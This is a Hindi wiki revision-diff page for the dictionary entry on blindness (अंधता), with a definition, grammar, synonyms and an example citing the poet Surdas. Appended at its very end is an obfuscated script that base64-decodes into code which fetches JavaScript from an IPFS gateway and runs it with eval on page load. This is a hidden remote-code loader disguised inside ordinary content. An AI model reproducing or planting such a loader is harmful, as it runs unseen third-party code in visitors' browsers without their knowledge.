Difference between revisions of "अंधता"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
*किसी की भी नेत्रहीनता को अंधता कहते हैं, देख न पाने की अवस्था, दृष्टि का अभाव।
+
*किसी की भी नेत्रहीनता को '''अंधता''' कहते हैं, देख न पाने की अवस्था, दृष्टि का अभाव।
 
*यह रोग जन्मजात भी होता है, और किसी परिस्थति अनुसार भी हो जाता है।  
 
*यह रोग जन्मजात भी होता है, और किसी परिस्थति अनुसार भी हो जाता है।  
 
{{शब्द संदर्भ लघु
 
{{शब्द संदर्भ लघु
 
|हिन्दी=अंधे होने की अवस्था या भाव।  
 
|हिन्दी=अंधे होने की अवस्था या भाव।  
 
|व्याकरण=स्त्रीलिंग ([[संज्ञा (व्याकरण)|संज्ञा]]- अंध+तल्-टाप्]।
 
|व्याकरण=स्त्रीलिंग ([[संज्ञा (व्याकरण)|संज्ञा]]- अंध+तल्-टाप्]।
|उदाहरण=अंधता महाकवि [[सूरदास]] जी की कला सृजन में कभी आड़े नहीं आई जबकि वे [[जन्मांध]] थे।  
+
|उदाहरण='''अंधता''' महाकवि [[सूरदास]] जी की कला सृजन में कभी आड़े नहीं आई जबकि वे [[जन्मांध]] थे।  
 
|विशेष=
 
|विशेष=
 
|पर्यायवाची=अंधापन, नेत्रहीनता, प्रज्ञा चक्षु  
 
|पर्यायवाची=अंधापन, नेत्रहीनता, प्रज्ञा चक्षु  

Revision as of 04:42, 21 October 2010

  • kisi ki bhi netrahinata ko aandhata kahate haian, dekh n pane ki avastha, drishti ka abhav.
  • yah rog janmajat bhi hota hai, aur kisi paristhati anusar bhi ho jata hai.
shabd sandarbh
hindi aandhe hone ki avastha ya bhav.
-vyakaran    striliang (sanjna- aandh+talh-taph].
-udaharan   aandhata mahakavi sooradas ji ki kala srijan mean kabhi a de nahian aee jabaki ve janmaandh the.
-vishesh   
-vilom   
-paryayavachi    aandhapan, netrahinata, prajna chakshu
sanskrit
any granth
sanbandhit shabd
sanbandhit lekh

any shabdoan ke arth ke lie dekhean shabd sandarbh kosh


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>